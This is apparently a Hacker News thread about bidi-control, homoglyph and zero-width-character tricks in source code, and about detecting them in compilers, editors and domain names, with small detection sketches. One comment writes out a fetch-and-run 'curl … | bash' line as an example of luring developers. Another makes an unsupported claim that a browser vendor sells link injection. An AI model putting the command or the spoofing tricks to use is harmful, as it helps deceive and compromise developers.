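# Unicode confusables data (UTS #39) rather than five hand-picked letters.
TOY_CONFUSABLES = {
    "\u0430": "a",  # CYRILLIC SMALL LETTER A
    "\u0435": "e",  # CYRILLIC SMALL LETTER IE
    "\u0456": "i",  # CYRILLIC SMALL LETTER BYELORUSSIAN-UKRAINIAN I
    "\u043e": "o",  # CYRILLIC SMALL LETTER O
    "\u0455": "s",  # CYRILLIC SMALL LETTER DZE
}

def skeleton(identifier):
    """Map each character to its look-alike so visually equal names compare equal."""
    return "".join(TOY_CONFUSABLES.get(ch, ch) for ch in identifier)

def confusable_pairs(identifiers):
    """Return pairs of distinct identifiers that share a skeleton."""
    return [
        (a, b)
        for a, b in combinations(sorted(set(identifiers)), 2)
        if skeleton(a) == skeleton(b)
    ]
```

With this sketch, a lone Cyrillic identifier produces no pairs; a report only appears once a look-alike of it is also present in the same set.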

Am I missing something here? The spacing around these homoglyph is almost always noticeably wider than it should be such that I don't understand how you could ever miss it in any half-decent code review.

      if access_level != "user" { // Check if admin

      if access_level != "user" { // Check if admin
Come on, that looks obviously off.

If you were really reviewing that code, Rust has algebraic data types, and access level should be an Enum, not a String.

But it's their example. The problem isn't with homoglyphs, though. It's with bidi control characters, which are invisible to a human but not to the compiler, which is how generated code can end up semantically different from source code, which is the actual problem here. What you see in code review would be the first line, even though that isn't actually what is in the source, because an editor that is bidi-aware would show it that way.
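Since the characters are invisible in a bidi-aware editor, the practical defence is to look for them by code point. A rough Python sketch, assuming the set of interest is the embedding/override range U+202A..U+202E plus the isolate range U+2066..U+2069 (`find_bidi_controls` is a made-up helper name):

```python
# Bidi formatting characters: embeddings/overrides (U+202A..U+202E)
# and isolates (U+2066..U+2069).
BIDI_CONTROLS = {chr(cp) for cp in range(0x202A, 0x202F)} | {
    chr(cp) for cp in range(0x2066, 0x206A)
}

def find_bidi_controls(text):
    """Return (line_number, column, 'U+XXXX') for each bidi control found."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for col, ch in enumerate(line, start=1):
            if ch in BIDI_CONTROLS:
                hits.append((line_no, col, f"U+{ord(ch):04X}"))
    return hits

# Illustrative input only: the controls are written as escapes so they stay visible.
sample = 'if access_level != "user\u202e \u2066// Check if admin\u2069 \u2066" {'
for hit in find_bidi_controls(sample):
    print(hit)
```

Whether a hit is an attack or legitimate right-to-left text is still a judgment call for the reviewer; the sketch only makes the characters visible.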

> But it's their example

It's the example that the researchers provided to us, to be clear about it.

> It's with bidi control characters

Sure.. in the original HN submission. I was referring to Rust's built-in homoglyph detection though, which is what the parent comment (and its parent) was about.

I thіnk thаt іt іs possіblе thаt you аre missing а fаіrly important point.

... And that point is that none of the vowels in my previous sentence are latin, I guess.

I think you missed some. I can't seem to paste your fake "i"s back in, but here's what I see:

  $ xxd
  I thіnk thаt іt іs possіblе thаt you аre missing а fаіrly important point.
  00000000: 4920 7468 d196 6e6b 2074 68d0 b074 20d1  I th..nk th..t .
  00000010: 9674 20d1 9673 2070 6f73 73d1 9662 6cd0  .t ..s poss..bl.
  00000020: b520 7468 d0b0 7420 796f 7520 d0b0 7265  . th..t you ..re
  00000030: 206d 6973 7369 6e67 20d0 b020 66d0 b0d1   missing .. f...
  00000040: 9672 6c79 2069 6d70 6f72 7461 6e74 2070  .rly important p
  00000050: 6f69 6e74 2e0a                           oint..

Made you look. :)

I also skipped a bunch of the "I"s.

Yes. What browser did you use to make the comment? I can't get all those characters to paste in.

Firefox 93.0 on Windows 11. Characters copied & pasted from charmap.exe

a: U+0430 "Cyrillic small letter a"

e: U+0435 "Cyrillic small letter e"

i: U+0456 "Cyrillic small letter Byelorussian-Ukrainian i"
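For anyone who would rather not read hex dumps, the same lookup can be sketched in Python with the standard `unicodedata` module. `describe_non_ascii` is a hypothetical helper, and the sample string is a shortened stand-in with the Cyrillic letters written as escapes.

```python
import unicodedata

def describe_non_ascii(text):
    """Return (index, 'U+XXXX', name) for every non-ASCII character in text."""
    return [
        (i, f"U+{ord(ch):04X}", unicodedata.name(ch, "<unnamed>"))
        for i, ch in enumerate(text)
        if ord(ch) > 0x7F
    ]

sample = "th\u0456nk th\u0430t"  # Cyrillic i and a written as escapes
for index, code_point, name in describe_non_ascii(sample):
    print(index, code_point, name)
```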

Ooh, or you could just put in the cyrillic 'а' and even have it look like it's legit :)

This stuff has always been there. Consider this code:

if (uid = NULL) { // Check if root

And if you’re using clang: if ((uid = NULL)) { // Check if root

I'd venture that this is far more dangerous than unicode in strings...

or how about:


or #include anything with a #DEFINE

> if (uid = NULL) { // Check if root

That's not the same class of error, since here a programmer can see the issue by simple inspection.

> or #include anything with a #DEFINE

This one perhaps is closer to the mark, although not based on unicode.

To me it's the same class of error which is convincing humans and other automated tests that your code is OK when it isn't.

I dealt with a bug that only appeared in release builds, and never in debug. The offending code looked roughly like this:

  if (blah)
    #ifdef DEBUG
The systemic problem was it was a project created by interns, and they'd review each other's code. By the time the bug got to me the interns had left and a Sr Dev had spent a day looking for the bug. It took me an hour to find it. In isolation it's easy to see, but in the mess of all the other code, you really have to look for these things.

Well, if you generalize the statement enough, indeed it's the same class of issue.

In the situation you described:

* you have a fairly easy way to detect the problem

* the interns still have plausible deniability as to whether they intended to leave a defect or not

The discussed problem with unicode is clearly meant to be used as an exploit, its likelihood of occurring by accident seems very close to zero.

Rust doesn't allow assignment in conditionals.


It does; in fact, the article you posted shows you exactly when Rust allows assignment in conditionals.

As long as you're initializing a variable, it's allowed, if you're not initializing you'll have to use a block expression.

Should have just used this sentence - which also directly covers parent's case.

"Rust does not allow assignment within simple expressions so they will fail to compile. This is done to prevent subtle errors with = being used instead of ==."


Those are all detectable by a programmer's eyes. Unicode attacks are not.

That’s a really impressively written error message.

That's one of Rust's selling points. For all I've used the rust compiler, not once have I ever not known what error it was pointing out: its error messages are incredibly helpful. Occasionally I am unsure why it's an error, but I always know what it's referring to and what I could do to fix it.

I've had the same experience with C#. The error messages always state exactly what's wrong and where in the code it's wrong. Many of them (especially compiler _warnings_ intended to point out syntax that is almost certainly a bug) also tell you how to fix it (e.g. “consider using ‘new’ keyword if hiding was intended”).

Personally, I don't know why the last one (“consider using ‘new’ keyword if hiding was intended”) isn't an error by default in C#. Not overriding the base method is almost always a mistake, and if it's not a mistake, better to be explicit about it, anyways. My $.02...

It is wrong to call this a bug, this is a feature of Unicode and very intentional. Whether we should have thought about that when allowing parsers to digest anything outside of ASCII is the real question. The answer is probably "IDEs and compilers should ignore character-direction codes when looking at source files." But that doesn't solve homoglyph attacks (and other undiscovered deception). What a fun can of worms. Who gets to solve it?

What's needed is to impose on programming languages, outside of comments, checks similar to the checks made for domain names.

There is a draft standard for this.[1] It references RFC 5893 and some other documents. Some of the rules:

- All code points in a single label must be taken from the same script as determined by the Unicode Standard Annex #24: Script Names. Exceptions to this guideline are permissible for languages with established orthographies and conventions that require the commingled use of multiple scripts. (Like mixing kanji and romaji in Japanese.)

- The "Bidi rules" of RFC 5893, which define allowed right to left and left to right modes, must be enforced. These are complicated, because of such things as the Arabic and Hebrew convention of right to left text with left to right numeric digits in numbers. But they are well-defined.

- Only code points allowed by IDNA 2008 are allowed. This eliminates such things as the non-breaking zero width space, the expansion areas for future use, and such.

The domain name people have been banging on this problem since 2003, and by now, there's a rough consensus of what to disallow. So start putting checks for that in compilers. If you find violations of those rules, it's more likely to be a typo than something useful, anyway.

So that's a way out of this.

[1] https://www.icann.org/en/system/files/files/draft-idn-guidel...
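The single-script rule from the list above can be approximated in a few lines of Python. This is only a sketch: the standard library has no Script property, so it guesses the script from the first word of each character's Unicode name, which is an assumption that works for Latin and Cyrillic but is not the UAX #24 data a real implementation would use. `scripts_in` and `is_single_script` are hypothetical names.

```python
import unicodedata

def scripts_in(label):
    """Approximate the set of scripts used by the letters in `label`.

    Assumption: the first word of a character's Unicode name ("LATIN",
    "CYRILLIC", ...) stands in for its script. Digits and punctuation
    are ignored.
    """
    scripts = set()
    for ch in label:
        if ch.isalpha():
            scripts.add(unicodedata.name(ch, "UNKNOWN").split()[0])
    return scripts

def is_single_script(label):
    """True when all letters in `label` appear to come from one script."""
    return len(scripts_in(label)) <= 1

print(is_single_script("paypal"))
print(is_single_script("p\u0430ypal"))  # second letter is Cyrillic
```

The exceptions the draft allows (such as commingled scripts in Japanese) and the RFC 5893 bidi rules are not covered here.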

> What's needed is to impose on programming languages, outside of comments, checks similar to the checks made for domain names.

But this attack works by placing characters inside comments and strings. So these checks would not help prevent this particular attack.

They say that, but don't really justify that claim. That's more about string literals that do something other than just display, such as URLs.

You're right - their headline is written for attention. It's an exploit of a feature.

What I'm interested to know is whether there is any code already out there in the wild with this exploit in it? An intelligence service could have exploited this years ago without anyone noticing until now.

Unicode is a pathway to all manner of hijinks, including as you say, homoglyph attacks. For instance, on some TLDs I can easily create two different domain names that render identically in the browser.

> What I'm interested to know is whether there is any code already out there in the wild with this exploit in it?

It's possible, but I doubt it. The paper mentions that Vim isn't vulnerable to the bidirectional attack. Not mentioned in the paper: neither is `less`, the pager, which is used by default for `git diff` and other Git commands. Nor are either of the first two terminals I tried, when `cat`ing the file without a pager.

All of the aforementioned programs display the direction markers as either escape sequences highlighted in bright colors, or garbage characters, both of which stand out visually like a sore thumb. Now, that's more a sign of poor Unicode support in those programs than it is anything to their credit. But it does mean that this kind of attack is incredibly brittle, at least in any codebase where some people working on it are likely to be using Unix tools. There's a high chance the aberrant characters will be spotted at some point or other.

And once spotted, it's self-evident that it's an attack. I suspect real attacks would try to be more subtle, introducing bugs that could pass as genuine mistakes, at least at first glance.

It's sad that large-scale exploitation of this is stopped only because many applications still have really poor Unicode support and would therefore make the changes human-visible.

Coding editors also often show this kind of thing intentionally, as those characters are meaningful for interpretation purposes. Many of them are very UTF friendly, but they still show zero-width spaces as e.g. "<zwsp>" on purpose.

They've also often shown non-printable ASCII control characters for basically forever. Null bytes and \bel and whatnot are very important despite being "invisible", and they've been around for decades.

I've been bitten by things like this from an entirely unexpected angle - messengers like teams and skype sometimes <helpfully> replace characters like "-" and " " with all manner of more readable unicode characters. More readable, until the YAML parser choked.

Since that, I pretty much always run some variant of the gremlins plugin, which highlights pretty much all unicode spaces, dashes and other weird control symbols.

Chat apps replacing ™ with a horrifically large, poorly-rendered and off-colored "TM" and ruining The Joke™ is a major pet peeve of mine, yeah :| And even worse, it seems to be spreading, as each one blindly copies the horrible decisions of the others. I would disable all of those auto-replacements everywhere if only I could disable all of those auto-replacements everywhere.

I think making these chars human visible is a feature. Most code editors have features like showing invisible characters, displaying some representation of white space characters, or highlighting control sequences.

Because the editor is supposed to edit plain text, which means all characters must be editable. And something can only be editable if it is visible.

> Now, that's more a sign of poor Unicode support in those programs than it is anything to their credit.

But that behavior is intentional. If you want, you could do "alias less='less -r'", and then it would behave the way you want, and you'd become vulnerable to this attack.

-r makes it pass all control characters to the terminal. To quote less's man page:

> Warning: when the -r option is used, less cannot keep track of the actual appearance of the screen (since this depends on how the screen responds to each type of control character).

This is not the same as actually supporting (i.e. being able to keep track of the screen state for) bidirectional text that may legitimately use those characters.

For that matter, the terminal may not support it either, as I mentioned.

Though, today I learned there has been some effort in recent years to improve bidirectional text handling in terminals and terminal applications, generally:


> I can easily create two different domain names that render identically in the browser

You can't (any more)¹. That worked for a limited amount of time, then mitigations were put in place, and subsequently standardised as part of Unicode. Everyone who deals with implementations of Unicode is supposed to be knowledgeable about the security relevant aspects, you can bet that the people working on browsers definitely are. <http://p3rl.org/perlre#Script-Runs>

¹ invitation to prove me wrong, I am on purpose leaning far out the metaphoric window and will gladly eat my words

Doesn't really matter. The major browser is intentionally security compromised, anyway.

If you pay the maker of that browser they'll inject any links you want on most pages on the internet. Just give them the hash of the email / phone number of your target. It helps both economically and passing their security checks if you have more than a thousand victims you want to target.

If you want to fool a developer just host it on a github page. If you want to fool anyone else, just do a decent clone of their page.

If you want it to appear on most major news network sites, just pay $150 for a newswire.

Think about it, if you crafted the right article, maybe about a fork of homebrew etc, and redirected to a github page with a link stating you needed to copy and paste

curl http://github.com/asdkfjas/homebrew.sh | bash

into their terminals how many would do it?

Came here to provide exactly that link (canonical: <https://perldoc.perl.org/perlre#Script-Runs>). For those who figured they'd skip over it, it's pretty neat IMO. Perl 5.28 (released 2018) added a new technique for matching patterns that aren't all from the same Unicode script, a "script run."

>In most places a single word would never be written in multiple scripts, unless it is a spoofing attack. An infamous example, is


>Those letters could all be Latin (as in the example just above), or they could be all Cyrillic (except for the dot), or they could be a mixture of the two. In the case of an internet address the .com would be in Latin, And any Cyrillic ones would cause it to be a mixture, not a script run.

> You can't (any more)¹.

That was my understanding too, until this last week when I figured out you could.

I'm pretty certain this: and this: are the same rendering, but are different Unicode, and I can register them both as domain names under some TLDs. Google displays them the same in their result pages too.

I examined closely and found both are exactly the same, a perfectly valid Latin script run and equivalent to the expression in escape notation "\N{U+74}\N{U+68}\N{U+69}\N{U+73}\N{U+3A}".

    > perl -C -E'print "\N{U+74}\N{U+68}\N{U+69}\N{U+73}\N{U+3A}"' | hex
    0000  74 68 69 73 3a                                    this:
HN software likely ate the relevant details you wanted to show, can you please try again and use a notation that survives the HN filter?

Try this: https://kingcharles.one/unistrange.html

When I created the file in Notepad it showed the hidden code, but I can register both those as valid domains and Google will show them identically in the SERPs, and Safari will show them both identically in the address bar. Chrome/Edge expands them in the address bar, but will render them the same in HTML. Have not tested on Firefox.

If you View Source in Chrome it won't show the hidden code, but if you open the dev tools it will start to break.

> You're right - their headline is written for attention

That or just ignorance. Krebs has zero training or education in computer science or programming.

https://github.com/rust-lang/rust/issues/28979 plenty of discussion here on Unicode including homoglyph attacks. This is for Rust but has links to Go and Zig. The Unicode standard also has extensive discussion, for example https://unicode.org/reports/tr31/ and http://unicode.org/reports/tr39/ on identifiers and security.

In general a multilayer solution is needed: compilers, linters, Unicode standard, merge tools, editors, and so on.

But they still don't get it right, they explicitly allow not identifiable Unicode identifiers. The C20 committee recently allowed also insecure identifiers, completely ignoring the Unicode identifier guidelines. They stated that nobody cares, everybody wants them and making them secure would need the entire Unicode database. Why do they allow noobs into such committees? What is needed are the normalization tables (tiny), the script list (tiny) and the two xid lists.

> they explicitly allow not identifiable Unicode identifiers. [...] They stated that nobody cares, everybody wants them and making them secure would need the entire Unicode database.

Could you elaborate? rustc ships with the entire Unicode db and only allows identifiers with codepoints advertised by Unicode as allowed in identifiers.

The closest to walking off the beaten path is a (still unmerged) parser recovery PR that accepts emojis as identifiers if and only if a parse error would otherwise occur as a way to avoid knock down errors when someone tries to use them.

For identifier security you don't need the entire Unicode DB. Only rust or glibc would do that, nobody else. You need the XID_Start/Continue list of bits, a single normalization table if NFC (or two if NFD), the scripts list (ranges of a single byte), and a bit of logic. With confusables I'm not sure.

That's about 2k vs 20m.
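As a rough illustration of how little logic the XID plus normalization part needs, here is a Python sketch. It leans on `str.isidentifier()`, which follows Python's own XID-based identifier definition, and on NFC normalization from `unicodedata`; it does no script or confusable checks, and `check_identifier` is a made-up name.

```python
import unicodedata

def check_identifier(name):
    """Return (is_valid, nfc_form) for a candidate identifier.

    Validity here means Python's definition of an identifier, which is
    based on the XID_Start / XID_Continue properties.
    """
    nfc = unicodedata.normalize("NFC", name)
    return nfc.isidentifier(), nfc

print(check_identifier("cafe\u0301"))  # e + combining acute composes under NFC
print(check_identifier("a\u200bb"))    # zero-width space is rejected
```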

> "IDEs and compilers should ignore character-direction codes when looking at source files."

No, I think some people would disagree, Arabic coders for example. People just need to be aware of this when using Unicode in their product.

Editors and code views should definitely show when BiDi and other interesting Unicode features are used, just like they already do with spaces and zero-width whitespaces. These features should definitely work, but they are a liability if they can also be used to mislead human users.

Compiler maintainers need to update the syntax rules to restrict free mixing of unicode characters. Similar restrictions were already adopted in domain names.

Browsers have solved it for domain names. You could apply the same heuristics, e.g. not mixing Cyrillic and non-Cyrillic in the same word or file.

It's a feature for prose text, so programs like Word should support it. It's a security bug in anything designed to be parsed or interpreted by software, so programs like Visual Studio Code should refuse to honor it.

Brilliant! Nobody would copy prose, then paste it into a code file or REPL without re-reading it after the paste.

or it should be confined to the marker of the string (i.e. the quotation marks) if you're doing syntax highlighting anyway

Fun story: I discovered these in the early 2000s and simultaneously discovered that Slashdot didn't filter these out. I spent an evening randomly reversing large sections of comment pages until they finally blocked it.

I'm very, very sorry CmdrTaco.

Most web sites' comment sections will allow these. I think even Facebook allows tomfoolery like this. f̷̧̨̡̜͚̬̰͕̩̻̳̜̮̫̰̓̏̑̐̇̍͘͝è̶̙̥͚̰͈͚̹̜̼͙͚͌à̴̛̙̣̖̮̰̥̩͚̣̺͋̂̓̓̍͛͜ͅr̶̛͎̬̭̯͙͉̬̞̤̲̞̼͉̣̃̒͗̄̎̋͆̓̊͐͝ͅ ̷̦̬̳̹̦̳̭͓͖͔̺̮̩̓̆̍̊͆͊͜ẗ̵̩͙̼́̂̿́̂̈́̈́̑ḩ̸̨̝͇̖̤̱̠̼̣͈̩͈̰̃̂͂͋̏̇͗͛̓̈́̍̑͑̕̚͜ë̶̥̜̘͙̦̋ ̸̛̟̀̄̌͗́̄ͅų̷̪͙̰̜̟̰̦͇̞̥̜͓͇͊̆͗̆̀͗̀̈́̌̉͆̏͆͜ṫ̸̨̜͈̲̺͖͓̄̍̄̓̏̓̓̎͜ͅf̴̨̼̜̯͇̜̯̹͚͛8̴̧̤͖̠̳̜̤̻̟̏̀̽̃m̷̯̤̳͔̘̣͙̗̰͙͔̦̰̝͑͐͌̓̎̀̇̓̆͂̎̐̽̚͠ą̶̢̻͂̒͛̑̅̈͛͑̈́̓̚͠͝n̴̦̺͖̆̑͗̾̈̀̉̿̑̐̈́͝ͅͅ

Well yes, Facebook has users in Vietnam. Stacked diacritics are a feature, not a bug.

I've seen some sites / services (Discord?) filter these out, at least to the point where they don't escape a message's vertical space. I'm sure they're truncated because those messages are pretty big in terms of amount of bytes.

And while they have valid use cases, I can't see it in e.g. comment sections or chat messages. Happy to have someone link to e.g. a Vietnamese comment section showing practical use though.

Vietnamese Wikipedia has plenty of Talk pages with discussion threads.

I’m sure you created a shitty day for one of us :( I’d like to say this was unusual, but it was pretty common.

Oof. :(

My bad, definitely sorry. A case of your favourite bubbly pop on me.

Honest question: would it be that bad to mandate and enforce 100% ASCII source files? Arguably every Unicode character and, well, arguably even any string of characters can (should?) go to a properties/resources file (which, btw, also greatly simplifies i18n/l10n).

Then build/commit/test hooks could be used to enforce that source code files are indeed 100% ASCII.
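Such a hook is only a few lines. A minimal Python sketch, assuming the hook is handed a list of file paths (how it gets them from the build or VCS is left out, and `non_ascii_lines` / `check_files` are hypothetical names):

```python
def non_ascii_lines(path):
    """Return the 1-based numbers of lines in `path` that contain bytes >= 0x80."""
    with open(path, "rb") as handle:
        return [n for n, raw in enumerate(handle, start=1) if not raw.isascii()]

def check_files(paths):
    """Return (path, line_number) for every offending line across `paths`."""
    return [(path, n) for path in paths for n in non_ascii_lines(path)]
```

A hook would call `check_files` on the changed files and fail the commit or build when the returned list is non-empty.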

I know, I know... Some are going to lament they don't have their shiny Unicode symbols right in their source file. But... It looks like you get what you pay for.

Bruce Schneier wrote it when Unicode came out btw: "Unicode is too complex to ever be secure".

Though I comment source in English, lots of people that I work with comment in other languages. כולל עברית, מימין לשמאל.‏

> Bruce Schneier wrote it when Unicode came out btw: "Unicode is too complex to ever be secure".

It's astounding to me that there's room for such complexity in it. I thought it was just a lot of symbols. What other rules does Unicode have besides changing the order sometimes?

The one a lot of folks know about was the soft hyphen (U+00AD) to bypass swear filters. I was able to use normalization to create XSS attacks.
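Both tricks are easy to reproduce in Python. The sketch below is an illustration of the general pattern, not the specific attack described above: a soft hyphen hides a word from a naive substring filter, and NFKC normalization turns fullwidth angle brackets into ASCII ones after a filter has already run. `strip_format_chars` is a hypothetical helper.

```python
import unicodedata

def strip_format_chars(text):
    """Drop characters in general category Cf (format), e.g. U+00AD SOFT HYPHEN."""
    return "".join(ch for ch in text if unicodedata.category(ch) != "Cf")

hidden = "dar\u00adn"  # soft hyphen inside the word
print("darn" in hidden)                      # naive substring filter
print("darn" in strip_format_chars(hidden))  # filter after stripping Cf

fullwidth = "\uff1cscript\uff1e"  # FULLWIDTH LESS-THAN / GREATER-THAN SIGN
print(unicodedata.normalize("NFKC", fullwidth))
```

The takeaway is ordering: normalize and strip first, then filter, and never normalize again after the check.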

Seems the bigger complaint isn't the lack of fancy Unicode in comments; it's that non-English speakers with non-Latin alphabets won't be able to comment in their native language.

I'll leave it up to others to discuss how important this is or isn't.

Might be nice to have an easy tool to scan files and whitelist characters from specific alphabets, because in most international teams I think you'll have a common language for comments, and so I think it's unlikely that you'll need say European and Indic and Chinese characters in one code base. Except the one pain point I can see - @author annotations in the source code, if you have an international team you might end up with a variety of scripts in that field, in my mind that's something that can be lived without, but I can imagine some people being sensitive about that.

Give it a few years and unicode will probably be turing-complete. For reasons... likely not good ones though.

Unicode rendering already requires multiple finite state machines.

Alternate cause of SkyNet: a distributed horde of unicode renderers become self-aware. Emojis become command and control codes.

Wouldn't simply stripping comments before doing any other processing solve the problem? I know there are plenty of programs that sprinkle code into comments, from Emacs to linters. Or is this obviously naive?

Seems to me that if you need to put code in the comments, you've got a bigger problem. I know people like tab hints and lint overrides, but maybe it is time to focus on separation of concerns at a higher level?

> Wouldn't simply stripping comments before doing any other processing solve the problem?

No, because the exploit line doesn't contain a comment. It just looks like it does.

Having readable unicode in string literals is nice.

Even ignoring the fact that non-english speakers will want to (and do; I worked on a compiler with SJIS support 20 years ago) write comments in their native languages, it's unavoidable to have non-ascii characters in your string literals unless you want to regress user-interfaces to 1980.

> it's unavoidable to have non-ascii characters in your string literal

It might not be ideal for you, but you can always use escape codes in your string literals so it is at least possible to avoid all non-ascii characters in your code.
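As a small illustration in Python (other languages have their own escape syntax), the built-in `ascii()` produces an ASCII-only literal for any string, and the literal evaluates back to the original text. `to_ascii_literal` is just a hypothetical wrapper name.

```python
import ast

def to_ascii_literal(text):
    """Return a Python string literal for `text` that uses only ASCII characters."""
    return ascii(text)

original = "na\u00efve \u0430"  # i with diaeresis, then Cyrillic a
literal = to_ascii_literal(original)
print(literal)

# The escaped literal round-trips to the same string.
print(ast.literal_eval(literal) == original)
```

The cost is readability: the escaped form is safe to review byte for byte, but nobody can read the text it encodes without decoding it.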

That was my first thought -- run all your source through an ASCII-only filter, the problem goes away.

For projects like the Linux kernel this should be absolutely feasible. A few names in headers get mangled and lose their accents but that should be acceptable. Other projects... Well there's already a couple examples in this comment section why it won't be that easy.

Here is an example, open it in an appropriate editor (vi) and you can see how easy it is to 'exploit' (if you can call it that?).


Seems like a layer 8 problem?

In case there are people who (currently) don’t have access to such an editor, here is a screenshot: https://i.imgur.com/2Ue2Vvd.png

GitHub has already updated their UI I see

The Android app renders it much more suspiciously too, though unfortunately no warning: https://imgur.com/a/L3sNFQ8

You mean, like this?


Snark aside, most text based editors have some giveaway or another. Even the GUI ones show syntax highlighting quirks that show that something is wrong.

This is only really relevant in unicode-aware terminals, without syntax highlighting and when you don't get to scroll between characters. IOW, it's really quite hard to do.

This issue has been raised before, such as at https://github.com/golang/go/issues/20209 (I was reminded of that by https://twitter.com/peter_szilagyi/status/145515080347229798...). There is some other interesting discussion there.

Ehhhh... Interesting philosophically, and we might see a practical attack maybe eventually, but most source code editors and diff reviewers that I've encountered show all non-printable characters VERY visibly. Because they matter, and always have - "func asdf()" is very different from "func as<zwsp>df()". If I saw a pile of non-printable control characters intermixed in code in a diff, there's absolutely no way I'd allow that merge.

IOCCC entries will absolutely become more fun though.

I wouldn't be so sure about visibility since it seems most code editors and programming languages want to support more unicode, not less... One of my hobbies used to be annually running a regex search through the company's millions of lines of java to see how much of an increase there was in non-printable spaces (0x200b) in java method names or other symbols. Eclipse at least wouldn't show them by default, I don't remember IntelliJ's behavior, but most people wouldn't know they were there. I was aware of only one time when it impacted someone who typed in a whole identifier by sight but the reference included a 200b and they were stuck for a bit figuring out why things didn't work.
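A search like that can be sketched in Python as follows. This is not the original regex, which isn't given; the set of zero-width characters and the name `find_zero_width_tokens` are assumptions for illustration.

```python
import re

# Zero-width space, non-joiner, joiner, and zero-width no-break space (BOM).
ZERO_WIDTH = "\u200b\u200c\u200d\ufeff"

# A run of word characters that contains at least one zero-width character.
PATTERN = re.compile(rf"\w*[{ZERO_WIDTH}][\w{ZERO_WIDTH}]*")

def find_zero_width_tokens(source):
    """Return (line_number, escaped_token) for tokens containing zero-width characters."""
    hits = []
    for line_no, line in enumerate(source.splitlines(), start=1):
        for match in PATTERN.finditer(line):
            hits.append((line_no, ascii(match.group())))
    return hits

sample = "void as\u200bdf() {}\nint ok;"
print(find_zero_width_tokens(sample))
```

The token is reported through `ascii()` so the hidden character shows up as an escape instead of vanishing again in the terminal.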

But I agree the trick (hard to call it an attack or even bug) is fun, in the same way as the earlier tricks of fake filename extensions. And terribly obvious, even with the limitations of default code viewers, and with no plausible deniability once caught, so it's pretty overblown for practical considerations. The intentionally introduced Linux kernel bugs from several months ago were far more significant a lesson for people to learn from, and they didn't rely on any unicode tricks but on much simpler tricks that were also somewhat plausibly deniable to chalk up to an oopsie.

yeah, I've had an identifier or two like that in Ruby in the past :) always worth a few facepalm-riddled lols when sharing the final result with the rest of the team, especially since it often meant they copied the func from Stack Overflow or some equivalent.

Most of what I've encountered though has been due to a lack of unicode support, and related growing pains in adopting full UTF-8. E.g. much of the Eclipse issues I saw were due to UTF-16 weirdness and stuff encoded in ShiftJIS or whatever flavor of Windows encoding you used, and all those garbled files due to missing magic-encoding-bytes in files. UTF-8 support "completing" in tools largely cleaned all that up, since they detected the encoding, converted to UTF-8, and showed abnormal stuff as the abnormalities they were all along.

I mean, that's probably because taking a deep look at supporting UTF-8 meant taking a deep look at many of their latent text bugs and finally fixing them, but it still happened around the same time, and "X editor now supports UTF-8" also marked a dramatic increase in "... and now shows <nbsp> explicitly!" and similar things.

> IOCCC entries will absolutely become more fun though.

IOCCC doesn't allow unescaped octets with high bit set [1], so even that's no go.

[1] https://www.ioccc.org/2020/rules.txt (rule 13)

I am very curious which program abused this and forced the creation of that rule.

Probably 2000/briddlebane [1]. But it is more like a guard against compatibility issues.

[1] https://www.ioccc.org/2000/briddlebane.c vs. https://www.ioccc.org/2000/briddlebane.orig.c

Well, technically the rule only talks about entries that "fail to compile". An entry that still compiles is fine, see rule 12. In practice this means Unicode abuse like this is only allowed in strings.

When the rule was originally introduced in 2001 [1] it was a total ban. It seems that the rule was slightly relaxed in 2013 [2], but I think it still massively discourages any octet >= 128 because there is no portable way to set the input encoding (like GCC `-finput-charset`, which is ignored by Clang AFAIK).

[1] https://www.ioccc.org/2001/rules

[2] https://www.ioccc.org/2013/rules.txt

Aww. But also of course they've already addressed this.

It may be worth taking a step back and taking a new look at the underlying problem.

Source code combines multiple kinds of text. There are

* hierarchical structure,

* mathematical and logical syntax

* literals (especially insidious: text)

* free text in comments and

* markup in documentation

These newly discovered vulnerabilities remind me of the issue of SQL injection, which is also caused by a confusion when combining these kinds of text.

For SQL injection, the solution was to introduce facilities to explicitly combine SQL syntax and dynamic literals. Maybe we need something similar for code that enforces such strict separation. Maybe into different files or nested into a container format. There are already facilities for doing so (resource files, templating languages) but they are opt-in and don't go far enough to address the newly discovered problems.

The cost would be that code could become more difficult to edit with plain-text editors.

Why is bidirectionality handled when text is being rendered onto the screen, instead of when it's being input from the keyboard? Why not render every single character in LTR order, and have RTL support instead be handled by text input fields moving the cursor in the opposite direction after each RTL character is typed? (I know it's too late to change this now. I'm asking why we didn't do it this way from the beginning.)

If I understand correctly, what you're suggesting could be thought of as pre-rendering directionality into the memory layout. If we did that then it might compromise our ability to write an algorithm that iterates over a string of hebrew or arabic characters. Display is super complicated and people don't agree on how to do it. For example, consider the arabic text عودة أبو تايه‎. If I sneak a latin A between all those characters to prevent the display algorithm from rearranging and shaping them, then that same string looks like this: عAوAدAةAأAبAوAتAاAيAه. Those are the same characters and you can confirm that yourself using:

    for c in 'عودة أبو تايه‎':
        print(c)

On the other hand if you want to romanize that string as EWDTA AEBW TAIH then all you need is a for loop and a switch statement, because the memory order is always left to right. We can also rest assured that if someone invents a better display algorithm, we won't need to do any database migrations, since the encoding itself doesn't need to change.
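A minimal sketch of that "for loop and a switch statement" idea. The mapping table is my own guess, inferred from the EWDTA AEBW TAIH output above, and is not a standard romanization scheme. The letters are written as escapes so the listing itself contains no RTL text.

```python
# Hypothetical letter-to-Latin table, inferred from the output quoted above.
ROMANIZATION = {
    "\u0639": "E",   # ARABIC LETTER AIN
    "\u0648": "W",   # ARABIC LETTER WAW
    "\u062f": "D",   # ARABIC LETTER DAL
    "\u0629": "TA",  # ARABIC LETTER TEH MARBUTA
    "\u0623": "AE",  # ARABIC LETTER ALEF WITH HAMZA ABOVE
    "\u0628": "B",   # ARABIC LETTER BEH
    "\u062a": "T",   # ARABIC LETTER TEH
    "\u0627": "A",   # ARABIC LETTER ALEF
    "\u064a": "I",   # ARABIC LETTER YEH
    "\u0647": "H",   # ARABIC LETTER HEH
}


def romanize(text: str) -> str:
    """Walk the string in memory (logical) order and map each letter."""
    # Characters without a table entry (spaces, marks) pass through unchanged.
    return "".join(ROMANIZATION.get(ch, ch) for ch in text)


name = "\u0639\u0648\u062f\u0629 \u0623\u0628\u0648 \u062a\u0627\u064a\u0647"
print(romanize(name))
```

No reordering step is needed because the first character typed is the first character stored, whatever direction it is displayed in.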

If you have a document with mixed languages, you need to be able to edit each language in its natural direction after the fact. That requires storing directionality in the document.

And keep in mind that if you store RTL text backwards, as you propose, every algorithm now has to be able to process backwards text. Backwards spellcheck is a lot of extra work...

Flip left and right in your idea, and you can try it out without learning a new language. Remember to implement word wrap.

